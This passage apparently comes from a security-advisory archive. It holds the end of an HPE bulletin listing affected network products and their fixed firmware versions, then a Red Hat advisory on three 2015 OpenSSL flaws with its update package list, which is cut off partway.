- JD318B HPE 3100 8 v2 EI Switch
- JD319B HPE 3100 16 v2 EI Switch
- JD320B HPE 3100 24 v2 EI Switch
- JG221A HPE 3100 8 v2 SI Switch
- JG222A HPE 3100 16 v2 SI Switch
- JG223A HPE 3100 24 v2 SI Switch
HP870 (Comware 5) - Version: R2607P51
- HP Network Products
- JG723A HP 870 Unified Wired-WLAN Appliance
- JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance
HP850 (Comware 5) - Version: R2607P51
- HP Network Products
- JG722A HP 850 Unified Wired-WLAN Appliance
- JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance
HP830 (Comware 5) - Version: R3507P51
- HP Network Products
- JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch
- JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch
- JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch
- JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant
HP6000 (Comware 5) - Version: R2507P44
- HP Network Products
- JG639A HP 10500/7500 20G Unified Wired-WLAN Module
- JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module
WX5004-EI (Comware 5) - Version: R2507P44
- HP Network Products
- JD447B HP WX5002 Access Controller
- JD448A HP WX5004 Access Controller
- JD448B HP WX5004 Access Controller
- JD469A HP WX5004 Access Controller
SecBlade FW (Comware 5) - Version: R3181P07
- HP Network Products
- JC635A HP 12500 VPN Firewall Module
- JD245A HP 9500 VPN Firewall Module
- JD249A HP 10500/7500 Advanced VPN Firewall Module
- JD250A HP 6600 Firewall Processing Router Module
- JD251A HP 8800 Firewall Processing Module
- JD255A HP 5820 VPN Firewall Module
F1000-E (Comware 5) - Version: TBD still fixing
- HP Network Products
- JD272A HP F1000-E VPN Firewall Appliance
F1000-A-EI (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG214A HP F1000-A-EI VPN Firewall Appliance
F1000-S-EI (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG213A HP F1000-S-EI VPN Firewall Appliance
F5000-A (Comware 5) - Version: F3210P26
- HP Network Products
- JD259A HP A5000-A5 VPN Firewall Chassis
- JG215A HP F5000 Firewall Main Processing Unit
- JG216A HP F5000 Firewall Standalone Chassis
U200S and CS (Comware 5) - Version: F5123P33
- HP Network Products
- JD273A HP U200-S UTM Appliance
U200A and M (Comware 5) - Version: F5123P33
- HP Network Products
- JD275A HP U200-A UTM Appliance
F5000-C/S (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG650A HP F5000-C VPN Firewall Appliance
- JG370A HP F5000-S VPN Firewall Appliance
SecBlade III (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG371A HP 12500 20Gbps VPN Firewall Module
- JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module
6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC165A HP 6600 RPE-X1 Router Module
- JC177A HP 6608 Router
- JC177B HPE FlexNetwork 6608 Router Chassis
- JC178A HPE FlexNetwork 6604 Router Chassis
- JC178B HPE FlexNetwork 6604 Router Chassis
- JC496A HPE FlexNetwork 6616 Router Chassis
- JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC176A HP 6602 Router Chassis
HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
SMB1910 (Comware 5) - Version: R1113
- HP Network Products
- JG540A HP 1910-48 Switch
- JG539A HP 1910-24-PoE+ Switch
- JG538A HP 1910-24 Switch
- JG537A HP 1910-8 -PoE+ Switch
- JG536A HP 1910-8 Switch
SMB1920 (Comware 5) - Version: R1112
- HP Network Products
- JG928A HP 1920-48G-PoE+ (370W) Switch
- JG927A HP 1920-48G Switch
- JG926A HP 1920-24G-PoE+ (370W) Switch
- JG925A HP 1920-24G-PoE+ (180W) Switch
- JG924A HP 1920-24G Switch
- JG923A HP 1920-16G Switch
- JG922A HP 1920-8G-PoE+ (180W) Switch
- JG921A HP 1920-8G-PoE+ (65W) Switch
- JG920A HP 1920-8G Switch
V1910 (Comware 5) - Version: R1517P01
- HP Network Products
- JE005A HP 1910-16G Switch
- JE006A HP 1910-24G Switch
- JE007A HP 1910-24G-PoE (365W) Switch
- JE008A HP 1910-24G-PoE(170W) Switch
- JE009A HP 1910-48G Switch
- JG348A HP 1910-8G Switch
- JG349A HP 1910-8G-PoE+ (65W) Switch
- JG350A HP 1910-8G-PoE+ (180W) Switch
SMB 1620 (Comware 5) - Version: R1110
- HP Network Products
- JG914A HP 1620-48G Switch
- JG913A HP 1620-24G Switch
- JG912A HP 1620-8G Switch
NJ5000 - Version: R1107
- HP Network Products
- JH237A HPE FlexNetwork NJ5000 5G PoE+ Walljack

COMWARE 7 Products

12500 (Comware 7) - Version: R7377
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
10500 (Comware 7) - Version: R7180
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
12900 (Comware 7) - Version: R1150
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
5900 (Comware 7) - Version: R2432P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
MSR1000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
MSR2000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
MSR3000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
MSR4000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
VSR (Comware 7) - Version: E0322P01
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
7900 (Comware 7) - Version: R2150
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
5130 (Comware 7) - Version: R3113P02
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
6125XLG - Version: R2432P01
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
6127XLG - Version: R2432P01
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
Moonshot - Version: R2432P01
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
5700 (Comware 7) - Version: R2432P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
5930 (Comware 7) - Version: R2432P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
HSR6600 (Comware 7) - Version: R7103P09
- HP Network Products
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
HSR6800 (Comware 7) - Version: R7103P09
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing
- JH075A HP HSR6800 RSE-X3 Router Main Processing Unit
1950 (Comware 7) - Version: R3113P02
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
7500 (Comware 7) - Version: R7180
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
5510HI (Comware 7) - Version: R1120
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
5130HI (Comware 7) - Version: R1120
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch

iMC Products

IMC PLAT - Version: 7.2 E0403P04
- HP Network Products
- JD125A HP IMC Std S/W Platform w/100-node
- JD126A HP IMC Ent S/W Platform w/100-node
- JD808A HP IMC Ent Platform w/100-node License
- JD814A HP A-IMC Enterprise Edition Software DVD Media
- JD815A HP IMC Std Platform w/100-node License
- JD816A HP A-IMC Standard Edition Software DVD Media
- JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU
- JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
- JF377A HP IMC Std S/W Platform w/100-node Lic
- JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU
- JF378A HP IMC Ent S/W Platform w/200-node Lic
- JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU
- JG546AAE HP IMC Basic SW Platform w/50-node E-LTU
- JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
- JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU
- JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU
- JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU
- JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU
IMC iNode - Version: 7.2 E0407
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
iMC UAM_TAM - Version: 7.1 E0406
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
IMC WSM - Version: 7.2 E0502P04
- HP Network Products
- JD456A HP IMC WSM Software Module with 50-Access Point License
- JF414A HP IMC Wireless Service Manager Software Module with 50-Access Point License
- JF414AAE HP IMC Wireless Service Manager Software Module with 50-Access Point E-LTU
- JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager Module Upgrade with 250 Access Point E-LTU
- JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU
- JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg with 250-node E-LTU

VCX Products

VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0

Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.

HISTORY Version:1 (rev.1) - 21 February 2017 Initial release

Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:2617-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2617.html Issue date: 2015-12-14 CVE Names: CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 =====================================================================

Summary:

Updated openssl packages that fix three security issues are now available for Red Hat Enterprise Linux 6 and 7.

Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.

A NULL pointer derefernce flaw was found in the way OpenSSL verified signatures using the RSA PSS algorithm. A remote attacked could possibly use this flaw to crash a TLS/SSL client using OpenSSL, or a TLS/SSL server using OpenSSL if it enabled client authentication. (CVE-2015-3194)

A memory leak vulnerability was found in the way OpenSSL parsed PKCS#7 and CMS data. A remote attacker could use this flaw to cause an application that parses PKCS#7 or CMS data from untrusted sources to use an excessive amount of memory and possibly crash. (CVE-2015-3195)

A race condition flaw, leading to a double free, was found in the way OpenSSL handled pre-shared key (PSK) identify hints. A remote attacker could use this flaw to crash a multi-threaded SSL/TLS client using OpenSSL. (CVE-2015-3196)

All openssl users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.

Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter 1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak 1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: openssl-1.0.1e-42.el6_7.1.src.rpm

i386: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm

x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-perl-1.0.1e-42.el6_7.1.i686.rpm openssl-static-1.0.1e-42.el6_7.1.i686.rpm

x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: openssl-1.0.1e-42.el6_7.1.src.rpm

x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Red Hat Enterprise Linux Server (v. 6):

Source: openssl-1.0.1e-42.el6_7.1.src.rpm

i386: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm

ppc64: openssl-1.0.1e-42.el6_7.1.ppc.rpm openssl-1.0.1e-42.el6_7.1.ppc64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.ppc.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm openssl-devel-1.0.1e-42.el6_7.1.ppc.rpm openssl-devel-1.0.1e-42.el6_7.1.ppc64.rpm

s390x: openssl-1.0.1e-42.el6_7.1.s390.rpm openssl-1.0.1e-42.el6_7.1.s390x.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.s390.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm openssl-devel-1.0.1e-42.el6_7.1.s390.rpm openssl-devel-1.0.1e-42.el6_7.1.s390x.rpm

x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-perl-1.0.1e-42.el6_7.1.i686.rpm openssl-static-1.0.1e-42.el6_7.1.i686.rpm

ppc64: openssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm openssl-perl-1.0.1e-42.el6_7.1.ppc64.rpm openssl-static-1.0.1e-42.el6_7.1.ppc64.rpm

s390x: openssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm openssl-perl-1.0.1e-42.el6_7.1.s390x.rpm openssl-static-1.0.1e-42.el6_7.1.s390x.rpm

x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: openssl-1.0.1e-42.el6_7.1.src.rpm

i386: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-perl-1.0.1e-42.el6_7.1.i686.rpm openssl-static-1.0.1e-42.el6_7.1.i686.rpm

x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source: openssl-1.0.1e-51.el7_2.1.src.rpm

x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: openssl-1.0.1e-51.el7_2.1.src.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Red Hat Enterprise Linux Server (v. 7):

Source: openssl-1.0.1e-51.el7_2.1.src.rpm

aarch64: openssl-1.0.1e-51.el7_2.1.aarch64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm openssl-devel-1.0.1e-51.el7_2.1.aarch64.rpm openssl-libs-1.0.1e-51.el7_2.1.aarch64.rpm

ppc64: openssl-1.0.1e-51.el7_2.1.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.1.ppc.rpm openssl-devel-1.0.1e-51.el7_2.1.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.1.ppc.rpm openssl-libs-1.0.1e-51.el7_2.1.ppc64.rpm

